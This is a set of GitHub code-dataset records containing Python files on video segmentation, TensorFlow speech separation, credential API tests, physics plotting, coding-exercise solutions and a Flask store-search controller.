print(exc)\n\n @property\n def segments(self):\n ''' Return dict of priref/segments '''\n data = self._segmentation()\n\n # Validate segmentation\n if (len(self.items) > 1 or self.partwhole[1] > 1):\n missing = [i['object_number'][0] for i in self.items if 'video_part' not in i]\n if missing:\n print(f'* Insufficient video_part data in items: {\",\".join(missing)}')\n raise Exception(f\"* Insufficient video_part data in items: {','.join(missing)}\")\n\n if (len(self.items) > 1 and self.partwhole == [1, 1]):\n print(data)\n # JMW - reworked for Py3 dictionaries, using star function\n in_sort_segments = sorted(data.items(), key=star(lambda k,v: (v[0][0], k)))\n out_sort_segments = sorted(data.items(), key=star(lambda k,v: (v[-1][-1], k)))\n print(f\"Segments:\\n{in_sort_segments}\\n{out_sort_segments}\")\n if not in_sort_segments == out_sort_segments:\n raise Exception('Illegal video_part structure')\n # Sort segments\n data = in_sort_segments\n\n if self.partwhole[1] > 1:\n try:\n # Select tape's timecode parts\n me = self.partwhole[0]\n p = int(self.items[0]['priref'][0])\n data = {p: [data[p][me-1]]}\n except Exception as exc:\n obj = self.items[0]['object_number'][0]\n raise Exception(f'Insufficient video_part data for reel {me} in item {obj}') from exc\n print(data)\n return data\n\n def _segmentation(self):\n ''' Wrangle segmentation information in seconds for items carried '''\n\n def seconds(time_str):\n ''' Total seconds from mm.ss string '''\n if time_str.count('.') == 1:\n m, s = [int(i) for i in time_str.split('.')]\n elif time_str.count(':') == 2:\n h, m, s = [int(i) for i in time_str.split(':')]\n m += h * 60\n else:\n m, s = [int(time_str), 0]\n return int(datetime.timedelta(minutes=m, seconds=s).total_seconds())\n\n manifest = {}\n\n for i in self.items:\n item_priref = int(i['priref'][0])\n item_obj = i['object_number'][0]\n\n if 'video_part' not in i:\n continue\n\n parts = []\n sections = []\n\n video_parts = i['video_part']\n for p in video_parts:\n if p.count('-') != 1:\n raise Exception(f'Invalid video_part format in item {item_obj}')\n\n try:\n a, b = [seconds(n) for n in p.split('-')]\n except Exception as exc:\n raise Exception(f'Illegal video_part segment in item: {item_obj}') from exc\n\n if a > b:\n raise Exception(f'Invalid video_part data in item {item_obj}')\n\n segment = (a, b)\n\n # Detect time decrements as tape divisions\n if parts:\n if a < parts[-1][-1]:\n # Multi-reeler\n if self.partwhole[1] > 1:\n sections.append(parts)\n parts = []\n else:\n # Single-reeler shouldn't have decrement in video_part sequence\n raise Exception(f'Unexpected video_part discontinuation in item {item_obj}')\n\n parts.append(segment)\n\n if parts:\n sections.append(parts)\n\n manifest[item_priref] = sections\n\n return manifest\n\n\nclass Content():\n ''' Wrappers for obtaining a/v content from priref identifiers '''\n\n def __init__(self, priref):\n self.priref = priref\n self.imagen_record = self._record()\n self.media = self._media()\n self.umids = [{i: r[i][0] for i in r if i.endswith('_umid')}\n for r in self.media]\n\n self.image_urls = [f\"{DPI_PATH}{i['imagen.media.largeimage_umid']}\" for i in self.umids]\n\n self.images = [Image.open(requests.get(i, stream=True, verify=False).raw)\n for i in self.image_urls]\n\n def _record(self):\n q = f'priref={self.priref}'\n f = 'imagen.record_identifier'\n r = cid_get('internalobject', q, f)\n id_ = str(r.records[0]['Imagen'][0][f][0])\n return id_\n\n def _media(self):\n q = f'imagen.media.identifier={self.imagen_record}'\n r = cid_get('media', q, '')\n return r.records\n\n\ndef cid_get(database, search, fields):\n ''' Simple query wrapper '''\n\n d = {'database': database,\n 'search': search,\n 'fields': fields,\n 'output': 'json',\n 'limit': '0'}\n\n try:\n result = CID.get(d)\n print(result)\n except Exception as exc:\n raise Exception from exc\n\n return result\n","repo_name":"bfidatadigipres/BFI_scripts","sub_path":"splitting_scripts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":16463,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"7883464002","text":"import tensorflow as tf\nimport numpy as np\nimport math\n\nfrom NTMCell import *\nfrom ops import _weight_variable, _bias_variable\n\nclass Model(object):\n def __init__(self, architecture, input_size, output_size, batch_size, time_step, LR, activation_function=None, \n batch_norm=True, window=1):\n # basic setting\n self.input_size = input_size\n self.output_size = output_size\n self.time_step = time_step\n self.batch_size = batch_size\n self.batch_norm = batch_norm\n self.LR = LR\n self.num_layer = len(architecture)\n self.architecture = architecture\n self.window = window\n self.sequence_length = [time_step]*batch_size # the list storing the time_step in each batch size\n \n # placeholder: it allow to feed in different data in each iteration\n self.x = tf.placeholder(tf.float32, [None, input_size*window], name='x')\n self.y1 = tf.placeholder(tf.float32, [None, output_size], name='y1')\n self.y2 = tf.placeholder(tf.float32, [None, output_size], name='y2')\n self.is_batch_norm_train = tf.placeholder(tf.bool)\n \n # feed forward\n with tf.variable_scope('FushionModel'):\n self.feed_forward(activation_function)\n \n # optimization\n self.compute_cost()\n self.optimizer = tf.train.AdamOptimizer(self.LR)\n \n \"\"\" not global\"\"\"\n grad_var = self.optimizer.compute_gradients(self.cost)\n def GradientClip(grad):\n if grad is None:\n return grad\n #return tf.clip_by_norm(grad, 1)\n return tf.clip_by_value(grad, -1, 1)\n clip_grad_var = [(GradientClip(grad), var) for grad, var in grad_var ]\n self.train_op = self.optimizer.apply_gradients(clip_grad_var)\n \n def feed_forward(self, activation_function=None):\n data = tf.reshape(self.x, [-1, self.input_size*self.window])\n self.Neurons = {'h0':data}\n self.States = {}\n self.init_state = {}\n for idx in range(1, self.num_layer):\n if self.architecture['l'+str(idx)]['type'] == 'fc':\n now_size = self.architecture['l'+str(idx-1)]['neurons']\n next_size = self.architecture['l'+str(idx)]['neurons']\n with tf.variable_scope('l'+str(idx)):\n W = _weight_variable([now_size, next_size])\n b = _bias_variable([next_size,])\n neurons = tf.nn.bias_add( tf.matmul(self.Neurons['h'+str(idx-1)], W), b )\n if activation_function != None:\n neurons = activation_function(neurons)\n self.Neurons.update({'h'+str(idx):neurons})\n elif self.architecture['l'+str(idx)]['type'] == 'lstm':\n now_size = self.architecture['l'+str(idx-1)]['neurons']\n next_size = self.architecture['l'+str(idx)]['neurons']\n lstm_cell = tf.nn.rnn_cell.LSTMCell(next_size, use_peepholes=False, forget_bias=1.0)\n self.init_state.update({'h'+str(idx):lstm_cell.zero_state(self.batch_size, dtype=tf.float32)})\n with tf.variable_scope('l'+str(idx)):\n neurons, final_state = tf.nn.dynamic_rnn(\n lstm_cell, tf.reshape(self.Neurons['h'+str(idx-1)], [-1, self.time_step, now_size], ), \n sequence_length=self.sequence_length, \n initial_state=self.init_state['h'+str(idx)], time_major=False)\n neurons = tf.reshape(neurons, [-1, next_size])\n self.Neurons.update({'h'+str(idx):neurons})\n self.States.update({'h'+str(idx):final_state})\n elif self.architecture['l'+str(idx)]['type'] == 'output':\n now_size = self.architecture['l'+str(idx-1)]['neurons']\n next_size = self.architecture['l'+str(idx)]['neurons']\n with tf.variable_scope('output'):\n with tf.variable_scope('sp1'):\n W1 = _weight_variable([now_size, next_size])\n b1 = _bias_variable([next_size,])\n with tf.variable_scope('sp2'): \n W2 = _weight_variable([now_size, next_size])\n b2 = _bias_variable([next_size,])\n #[:, ((self.window+1)/2-1)*self.input_size:((self.window+1)/2)*self.input_size]\n neurons1 = tf.nn.bias_add(tf.matmul(self.Neurons['h'+str(idx-1)], W1), b1)\n neurons2 = tf.nn.bias_add(tf.matmul(self.Neurons['h'+str(idx-1)], W2), b2)\n \n summ = tf.add(tf.abs(neurons1), tf.abs(neurons2)) + (1e-6)\n mask1 = tf.div(tf.abs(neurons1), summ)\n mask2 = tf.div(tf.abs(neurons2), summ)\n self.pred1 = tf.mul(\n self.Neurons['h0'][:, ((self.window+1)/2-1)*self.input_size:((self.window+1)/2)*self.input_size], mask1)\n self.pred2 = tf.mul(\n self.Neurons['h0'][:, ((self.window+1)/2-1)*self.input_size:((self.window+1)/2)*self.input_size], mask2)\n self.Neurons.update({'h'+str(idx)+'1':self.pred1})\n self.Neurons.update({'h'+str(idx)+'2':self.pred2})\n elif (self.architecture['l'+str(idx)]['type'] == 'ntm'):\n now_size = self.architecture['l'+str(idx-1)]['neurons'] # input for ntm\n next_size = self.architecture['l'+str(idx)]['neurons'] # output for ntm\n mem_size = self.architecture['l'+str(idx)]['mem_size'] \n ntm_cell = NTMCell(now_size, next_size, mem_size=mem_size)\n self.init_state.update({'h'+str(idx):ntm_cell.zero_state(self.batch_size, dtype=tf.float32)})\n with tf.variable_scope('l'+str(idx)):\n neurons, final_state = tf.nn.dynamic_rnn(\n ntm_cell, tf.reshape(self.Neurons['h'+str(idx-1)], [-1, self.time_step, now_size], ), \n sequence_length=self.sequence_length, \n initial_state=self.init_state['h'+str(idx)], time_major=False)\n neurons = tf.reshape(neurons, [-1, next_size])\n self.Neurons.update({'h'+str(idx):neurons})\n self.States.update({'h'+str(idx):final_state})\n \n def init_state_assign(self):\n self.init_state = self.States\n \n def compute_cost(self):\n self.cost_to_show = (self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'1'], self.y1) + \\\n self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'2'], self.y2))/2\n self.cost = (self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'1'], self.y1) + \\\n self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'2'], self.y2) - \\\n 0*(self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'1'], self.y2) + \\\n self.ms_error(self.Neurons['h'+str(self.num_layer-1)+'2'], self.y1)))/2\n def ms_error(self, y_pre, y_target):\n return tf.reduce_sum(tf.reduce_sum( tf.square(tf.sub(y_pre, y_target)), 1))\n ","repo_name":"KWTsou1220/mann-for-speech-separation","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":7241,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"12031777561","text":"\"\"\"\nTests for Credential route\n\"\"\"\nfrom http import HTTPStatus\nfrom unittest.mock import patch\n\nimport pytest\nfrom bson.objectid import ObjectId\n\nfrom featurebyte.models.credential import decrypt_value\nfrom tests.unit.routes.base import BaseApiTestSuite\n\n\nclass TestCredentialApi(BaseApiTestSuite):\n \"\"\"\n TestCredentialApi class\n \"\"\"\n\n class_name = \"Credential\"\n base_route = \"/credential\"\n unknown_id = ObjectId()\n payload = BaseApiTestSuite.load_payload(\"tests/fixtures/request_payloads/credential.json\")\n create_conflict_payload_expected_detail_pairs = [\n (\n payload,\n f'Credential (id: \"{payload[\"_id\"]}\") already exists. '\n f'Get the existing object by `Credential.get_by_id(id=\"{payload[\"_id\"]}\")`.',\n ),\n (\n {**payload, \"_id\": str(ObjectId())},\n f'Credential (feature_store_id: \"{payload[\"feature_store_id\"]}\") already exists. '\n f'Get the existing object by `Credential.get_by_id(id=\"{payload[\"_id\"]}\")`.',\n ),\n ]\n create_unprocessable_payload_expected_detail_pairs = [\n (\n {**payload, \"name\": [\"test\"]},\n [\n {\n \"loc\": [\"body\", \"name\"],\n \"msg\": \"str type expected\",\n \"type\": \"type_error.str\",\n }\n ],\n )\n ]\n\n @pytest.fixture(autouse=True)\n def patch_validate_credentials(self):\n \"\"\"\n Mock _validate_credential method\n \"\"\"\n with patch(\"featurebyte.service.credential.CredentialService._validate_credential\"):\n yield\n\n def setup_creation_route(self, api_client):\n \"\"\"\n Setup for post route\n \"\"\"\n api_object_filename_pairs = [\n (\"feature_store\", \"feature_store\"),\n ]\n for api_object, filename in api_object_filename_pairs:\n payload = self.load_payload(f\"tests/fixtures/request_payloads/{filename}.json\")\n response = api_client.post(f\"/{api_object}\", json=payload)\n assert response.status_code == HTTPStatus.CREATED\n\n # delete credential stored for feature store\n response = api_client.get(f\"{self.base_route}\")\n assert response.status_code == HTTPStatus.OK\n results = response.json()\n credential_id = results[\"data\"][0][\"_id\"]\n response = api_client.delete(f\"{self.base_route}/{credential_id}\")\n assert response.status_code == HTTPStatus.OK\n\n def multiple_success_payload_generator(self, api_client):\n \"\"\"Create multiple payload for setting up create_multiple_success_responses fixture\"\"\"\n _ = api_client\n\n for i in range(3):\n payload = self.payload.copy()\n payload[\"_id\"] = str(ObjectId())\n payload[\"name\"] = f'{self.payload[\"name\"]}_{i}'\n payload[\"feature_store_id\"] = str(ObjectId())\n yield payload\n\n def test_update_200(self, create_success_response, test_api_client_persistent):\n \"\"\"\n Test credential update (success)\n \"\"\"\n test_api_client, _ = test_api_client_persistent\n response_dict = create_success_response.json()\n credential_id = response_dict[\"_id\"]\n response = test_api_client.patch(\n f\"{self.base_route}/{credential_id}\",\n json={\n \"database_credential\": {\n \"type\": \"ACCESS_TOKEN\",\n \"access_token\": \"test2\",\n },\n \"storage_credential\": {\n \"type\": \"S3\",\n \"s3_access_key_id\": \"test1\",\n \"s3_secret_access_key\": \"test2\",\n },\n },\n )\n assert response.status_code == HTTPStatus.OK, response.json()\n result = response.json()\n\n # credentials should not exposed in response\n assert \"database_credential\" not in result\n assert \"storage_credential\" not in result\n\n # credential types will be exposed instead\n assert result[\"database_credential_type\"] == \"ACCESS_TOKEN\"\n assert result[\"storage_credential_type\"] == \"S3\"\n\n # test get audit records\n response = test_api_client.get(f\"{self.base_route}/audit/{credential_id}\")\n assert response.status_code == HTTPStatus.OK\n results = response.json()\n assert results[\"total\"] == 2\n assert [record[\"action_type\"] for record in results[\"data\"]] == [\"UPDATE\", \"INSERT\"]\n previous_values = [\n record[\"previous_values\"].get(\"database_credential\") for record in results[\"data\"]\n ]\n assert previous_values[0][\"type\"] == \"USERNAME_PASSWORD\"\n assert decrypt_value(previous_values[0][\"username\"]) == \"user\"\n assert decrypt_value(previous_values[0][\"password\"]) == \"pass\"\n assert previous_values[1] is None\n\n def test_update_404(self, test_api_client_persistent):\n \"\"\"\n Test credential update (not found)\n \"\"\"\n test_api_client, _ = test_api_client_persistent\n unknown_credential_id = ObjectId()\n response = test_api_client.patch(\n f\"{self.base_route}/{unknown_credential_id}\",\n json={\n \"database_credential\": {\n \"type\": \"ACCESS_TOKEN\",\n \"access_token\": \"test2\",\n },\n },\n )\n assert response.status_code == HTTPStatus.NOT_FOUND\n assert response.json() == {\n \"detail\": (\n f'Credential (id: \"{unknown_credential_id}\") not found. Please save the Credential object first.'\n )\n }\n\n def test_update_422(self, test_api_client_persistent):\n \"\"\"\n Test credential update (unprocessable credential)\n \"\"\"\n test_api_client, _ = test_api_client_persistent\n unknown_credential_id = ObjectId()\n response = test_api_client.patch(f\"{self.base_route}/{unknown_credential_id}\")\n assert response.status_code == HTTPStatus.UNPROCESSABLE_ENTITY\n assert response.json() == {\n \"detail\": [\n {\n \"loc\": [\"body\"],\n \"msg\": \"field required\",\n \"type\": \"value_error.missing\",\n }\n ]\n }\n\n response = test_api_client.patch(f\"{self.base_route}/abc\", json={\"name\": \"anything\"})\n assert response.json()[\"detail\"] == [\n {\n \"loc\": [\"path\", self.id_field_name],\n \"msg\": \"Id must be of type PydanticObjectId\",\n \"type\": \"type_error\",\n }\n ]\n\n @pytest.mark.asyncio\n async def test_get_info_200(self, test_api_client_persistent, create_success_response):\n \"\"\"Test retrieve info\"\"\"\n test_api_client, _ = test_api_client_persistent\n create_response_dict = create_success_response.json()\n doc_id = create_response_dict[\"_id\"]\n response = test_api_client.get(\n f\"{self.base_route}/{doc_id}/info\", params={\"verbose\": False}\n )\n expected_info_response = {\n \"name\": \"grocery\",\n \"updated_at\": None,\n }\n assert response.status_code == HTTPStatus.OK, response.text\n response_dict = response.json()\n assert response_dict.items() > expected_info_response.items(), response_dict\n assert \"created_at\" in response_dict\n expected_feature_store_info = {\n \"name\": \"sf_featurestore\",\n \"source\": \"snowflake\",\n \"database_details\": {\n \"account\": \"sf_account\",\n \"warehouse\": \"sf_warehouse\",\n \"database\": \"sf_database\",\n \"sf_schema\": \"sf_schema\",\n },\n }\n assert response_dict[\"feature_store_info\"].items() > expected_feature_store_info.items()\n\n verbose_response = test_api_client.get(\n f\"{self.base_route}/{doc_id}/info\", params={\"verbose\": True}\n )\n assert response.status_code == HTTPStatus.OK, response.text\n verbose_response_dict = verbose_response.json()\n assert verbose_response_dict.items() > expected_info_response.items(), verbose_response.text\n assert \"created_at\" in verbose_response_dict\n","repo_name":"featurebyte/featurebyte","sub_path":"tests/unit/routes/test_credential.py","file_name":"test_credential.py","file_ext":"py","file_size_in_byte":8262,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"26789101354","text":"# coding: utf-8\nimport os\n\n\nen_ru = {}\nif os.path.exists(\"mydict.py\"):\n import mydict\n en_ru = mydict.en_ru\n\n\ndef fill_dict(en_ru):\n new_word = None\n # side-effect: en_ru is being changed here\n while new_word != \"\":\n new_word = input(\"Введите слово \")\n new_translate = input(\"Введите перевод \")\n\n if new_word not in en_ru and new_word != \"\":\n en_ru[new_word] = new_translate\n return\n\n\n\ndef save_dict(en_ru, dict_file_name=\"mydict.py\"):\n mydict = open(dict_file_name, \"w\")\n mydict.write(\"en_ru = %s\" % en_ru)\n mydict.close()\n return\n\nfill_dict(en_ru)\nsave_dict(en_ru)\nprint(en_ru)\n","repo_name":"doublewera/engtest","sub_path":"vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32778179225","text":"'''\nCreated on Aug 5, 2013\n\n@author: walton\n'''\nimport os \n\nfrom diffcalc.ub.persistence import UbCalculationNonPersister\n\n# These should be by the user *before* importing other modules\ngeometry = None\nhardware = None\nubcalc_persister = UbCalculationNonPersister()\n\naxes_scannable_group = None\nenergy_scannable = None\nenergy_scannable_multiplier_to_get_KeV=1\n\n\n# These will be set by dcyou, dcvlieg or dcwillmot\nubcalc_strategy = None\nangles_to_hkl_function = None # Used by checkub to avoid coupling it to an hkl module\ninclude_sigtau=False\ninclude_reference=False","repo_name":"swissfel/diffcalc3","sub_path":"diffcalc/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37109797522","text":"import matplotlib as mpl\nmpl.use('pdf')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom scipy.stats import chi2\nfrom icecube.umdtools import cache,misc\nfrom icecube import icetray, dataclasses, histlite\n\nfrom skylab import statistics\nfitfun = statistics.delta_chi2\nweibfun = statistics.weib\n##Make plots prettier\nmisc.tex_mpl_rc()\nw=4\npropsmall = mpl.font_manager.FontProperties (size='small')\npropxsmall = mpl.font_manager.FontProperties (size='x-small')\n\n###This script imports the sensitivities from the submitter and plots them.###\n#picklefolder = '/data/user/brelethford/Data/SwiftBAT70m/pickle/'\n\n## Define fcn to read in background trials previously logged ##\n\ndef getBckg(datafolder):\n files = [cache.load(datafolder+file) for file in os.listdir(datafolder) if file.endswith('.array')]\n n_inj=[]\n nsources=[]\n TS=[]\n beta=(0.5) #For background ts\n TS_beta=[] #Calculated from the total TS median after we get all the TS.\n beta_err=[]\n gamma=[]\n for file in files:\n for item in range(len(file['n_inj'])):\n n_inj.append(file['n_inj'][item])\n nsources.append(file['nsources'][item])\n TS.append(file['TS'][item])\n gamma.append(file['gamma'][item])\n\n TSs=TS\n TS_beta = np.percentile(TSs, 100.*(1. - beta))\n m=np.count_nonzero(np.asarray(TSs) > (TS_beta))\n i = len(TSs)\n fraction = float(m)/float(i)\n beta_err = (np.sqrt(fraction * (1. - fraction) / float(i)) if 0 < beta < 1 else 1.)\n bckg_trials = {'n_inj':n_inj,'nsources':np.asarray(nsources), 'TS':np.asarray(TS), 'beta':beta, 'beta_err':beta_err, 'TS_beta':TS_beta, 'gamma':np.asarray(gamma)}\n return bckg_trials\n\ndatafolder_2LAC = '/data/user/brelethford/Output/stacking_sensitivity/2LAC/flux_3yr/background_trials/'\n\nbckg_2LAC = getBckg(datafolder_2LAC)\n\nprint (bckg_2LAC['TS_beta'])\n\n\n##Now we make hists of the test statistics ##\nbins = 100\nrange = (0.0,20.0)\nh_2LAC = histlite.hist(bckg_2LAC['TS'],bins=bins,range=range)\n\n##I'll include a chi squared distribution w/ DOF=1 (and 2, just because). I'll also show the best fitting chi2 dist for each weighting scheme.##\nchi2fit_2LAC = fitfun(bckg_2LAC['TS'],df=2., floc=0., fscale=1.)\n\n#Now for a weibfit on the distribution.\nweib_flux_2LAC = weibfun(bckg_2LAC['TS'],df=2., floc=0., fscale=1.)\n\n## Now to plot. ##\nfig_bckg = plt.figure (figsize=(w, .75*w))\nax=plt.gca()\n\nweib_fits = [weib_flux_2LAC]\nchi2_fits = [chi2fit_2LAC]\ncolors=['blue']\nfor chi2_fit,weib_fit,color in zip(chi2_fits,weib_fits,colors):\n x = np.linspace(0,20,100)\n ax.plot(x, chi2_fit.pdf(x), linestyle=':',color=color, label=r'$\\tilde{\\chi}^2$')#: df='+str(round(chi2_fit.par[0],2)))\n ax.plot(x, weib_fit.pdf(x), linestyle='--', color=color, label = 'weibull')\n\nhistlite.plot1d(ax,h_2LAC.normalize(integrate=True),histtype='step',label='flux-weighted',color='blue')\nax.set_title(r'2LAC Background TS - 3yr (59-86I)')\nax.set_xlabel(r'TS')\nplt.subplots_adjust (left=.2, bottom=.2)\nax.set_ylabel(r'Normalized Counts') \nax.set_ylim(8e-5,1)\nax.set_xlim(0,16)\nax.semilogy() \nplt.legend(loc='upper right', prop=propxsmall, ncol=2)\nfig_bckg.savefig('/data/user/brelethford/AGN_Core/Plots/backgroundTS/bckgTS_2LAC_3yr.pdf')\nfig_bckg.savefig('/data/user/brelethford/AGN_Core/Plots/backgroundTS/bckgTS_2LAC_3yr.png')\n","repo_name":"brelethford/IceCube","sub_path":"skylab/sensitivity/stacking_sensitivity/plotting/obsolete/2LAC_background.py","file_name":"2LAC_background.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21083439324","text":"# https://www.hackerrank.com/challenges/three-month-preparation-kit-time-conversion/problem?isFullScreen=true&h_l=interview&playlist_slugs%5B%5D=preparation-kits&playlist_slugs%5B%5D=three-month-preparation-kit&playlist_slugs%5B%5D=three-month-week-one\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'timeConversion' function below.\n#\n# The function is expected to return a STRING.\n# The function accepts STRING s as parameter.\n#\n\ndef timeConversion(s):\n # Write your code here\n time, noon = s[:-2].split(':'), s[-2:]\n hour = int(s[:2])\n \n if noon == 'PM':\n hour = hour%12 + 12\n else:\n hour = hour%12\n time[0] = ''+str(hour) if hour//10 else '0'+str(hour)\n \n return ':'.join(time)\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = timeConversion(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"SquirtlesAlgorithmStudy/squirtlesAlgorithmStudy-S345","sub_path":"SangminByeon/HackerLink/TimeConversion.py","file_name":"TimeConversion.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"28100245128","text":"from typing import Optional\n\nfrom list_node import ListNode\nfrom test_framework import generic_test\n\n\ndef remove_duplicates(L: ListNode) -> Optional[ListNode]:\n # equal elems will be adjacent\n # 1. for each sequence of unique nums, find start and end node, end is not same num\n # 2. start.next = end\n # 3. move on\n\n node_iter = L\n\n while node_iter is not None:\n # node_iter sits at start of new sequence\n start_node = node_iter\n while node_iter is not None and node_iter.data == start_node.data:\n node_iter = node_iter.next\n\n # node_iter is None (end of list) or has different data value\n start_node.next = node_iter\n\n\n return L\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main(\n 'remove_duplicates_from_sorted_list.py',\n 'remove_duplicates_from_sorted_list.tsv', remove_duplicates))\n","repo_name":"adityagoel4512/EPIJudge","sub_path":"epi_judge_python/remove_duplicates_from_sorted_list.py","file_name":"remove_duplicates_from_sorted_list.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"41398510296","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def findBottomLeftValue(self, root: TreeNode) -> int:\n \n row = [root]\n \n while row:\n answer = row[0].val\n row = [child for node in row for child in (node.left, node.right) if child != None]\n return answer\n ","repo_name":"johnsanc/wb-cohort3","sub_path":"week-5/find-bottom-left-tree-val.py","file_name":"find-bottom-left-tree-val.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24949547829","text":"from data_structures.trees.binary_tree_lists import *\nfrom data_structures.trees.binary_tree_nodes import BinaryTree\n\n\"\"\"\nWrite a function that returns a tree_in using the list of lists functions that looks like this:\n\n a\n b c\n d e f\n\"\"\"\n\n\ndef build_tree_list():\n root = binary_tree(\"a\")\n insert_left(root, \"b\")\n insert_right(root, \"c\")\n b = get_left_child(root)\n c = get_right_child(root)\n insert_right(b, \"d\")\n insert_left(c, \"e\")\n insert_right(c, \"f\")\n return root\n\n\nprint(build_tree_list())\n\n\ndef build_tree_node():\n root = BinaryTree(\"a\")\n root.insert_left(\"b\")\n root.insert_right(\"c\")\n\n b = root.get_left_child()\n b.insert_right(\"d\")\n\n c = root.get_right_child()\n c.insert_left(\"e\")\n c.insert_right(\"f\")\n return root\n\n\ntree = build_tree_node()\nprint(tree.get_right_child().get_root())\nprint(tree.get_left_child().get_root())\nprint(tree.get_left_child().get_right_child().get_root())\nprint(tree.get_right_child().get_left_child().get_root())\nprint(tree.get_right_child().get_right_child().get_root())\n","repo_name":"SalihErenYuceturk/DSA-Python","sub_path":"exercises/6_trees_and_tree_algorithms/build_tree.py","file_name":"build_tree.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29746743185","text":"import os\nfrom flask_restplus import Namespace, Resource\nfrom flask import current_app as app\nfrom requests import post\n\nfrom backend.util.request.store.search_products_request import SearchProductsRequest\nfrom backend.util.response.store.search_products_results import SearchProductsResultsResponse\nfrom backend.util.response.error import ErrorResponse\nfrom backend.controller import ErrorHandler\nfrom backend.errors.no_content_error import NoContentError\nfrom backend.errors.request_error import ValidationError\n\n\nfindProductsNS = Namespace(\"Store\", description=\"Store related operations.\")\n\nREQUESTMODEL = SearchProductsRequest.get_model(findProductsNS, \"SearchProductsRequest\")\nRESPONSEMODEL = SearchProductsResultsResponse.get_model(findProductsNS, \"SearchProductsResultsResponse\")\nERRORMODEL = ErrorResponse.get_model(findProductsNS, \"ErrorResponse\")\n\n\n@findProductsNS.route(\"/find////\", strict_slashes=False)\nclass FinderProductsController(Resource):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.__url = app.config[\"WILLSTORES_WS\"]\n self.__headers = {\"Authorization\": \"Bearer %s\" % os.getenv(\"ACCESS_TOKEN\")}\n self.__finder_types = [\"search\", \"brand\", \"kind\"]\n\n @findProductsNS.param(\"ftype\", description=\"The product finder type: 'search', 'kind' or 'brand'\", _in=\"path\", required=True)\n @findProductsNS.param(\"arg\", description=\"The product finder argument: query, product kind or brand\", _in=\"path\", required=True)\n @findProductsNS.param(\"page\", description=\"The finder page.\", _in=\"path\", required=True)\n @findProductsNS.param(\"payload\", description=\"Optional\", _in=\"body\", required=False)\n @findProductsNS.expect(REQUESTMODEL)\n @findProductsNS.response(200, \"Success\", RESPONSEMODEL)\n @findProductsNS.response(204, \"No content\", {})\n @findProductsNS.response(400, \"Bad Request\", ERRORMODEL)\n @findProductsNS.response(500, \"Unexpected Error\", ERRORMODEL)\n @findProductsNS.response(502, \"Error while accessing the gateway server\", ERRORMODEL)\n @findProductsNS.response(504, \"No response from the gateway server\", ERRORMODEL)\n def post(self, ftype, arg, page):\n \"\"\"Finder products paginated by 'search query', 'kind' or 'brand'\"\"\"\n try:\n if ftype not in self.__finder_types:\n raise ValidationError(\"'%s' is an invalid URL finder type. Valid: 'search', 'brand' and 'kind'\" % ftype)\n if page <= 0:\n raise ValidationError(\"'%s' is an invalid URL page value. It must be a positive natural number\" % page)\n else:\n in_data = SearchProductsRequest.parse_json()\n req = post(\"%s/api/%s/%s/%s\" % (self.__url, ftype, arg, page), headers=self.__headers, json=in_data)\n req.raise_for_status()\n\n if req.status_code == 204:\n raise NoContentError()\n else:\n jsonsend = SearchProductsResultsResponse.marshall_json(req.json())\n return jsonsend\n except Exception as error:\n return ErrorHandler(error).handle_error()\n","repo_name":"willrp/willbuyer","sub_path":"backend/controller/api/store/find/find_products.py","file_name":"find_products.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"32582567995","text":"import numpy as np\nimport json\n\n\ndef convert_type(string):\n return float(string)\n\n\ndef get_info(path):\n # open the input file\n with open(path, \"r\") as info:\n data = json.load(info)\n return data\n\n\ndef save_info(data, path):\n # save the input file\n with open(path, \"w\") as f:\n json.dump(data, f, indent=4)\n\n\ndef get_extended_dataset(info, dataset_path):\n \"\"\" Using information from the info file, load images from the dataset file. \"\"\"\n\n training_dataset = []\n # open with context manager\n with open(dataset_path, \"r\") as dataset:\n for character_num in range(len(info[\"characters\"])):\n dataset.seek(info[\"characters\"][character_num][\"position\"] * 10 * 8 * 32 * 32)\n for sample in range(10):\n current_character = []\n for row_string in range(32):\n row_string = dataset.read(8 * 32)[:-1]\n row_pixels = row_string.split(\",\")\n row_pixels = list(map(convert_type, row_pixels))\n current_character.append(row_pixels)\n training_dataset.append(np.array(current_character))\n return 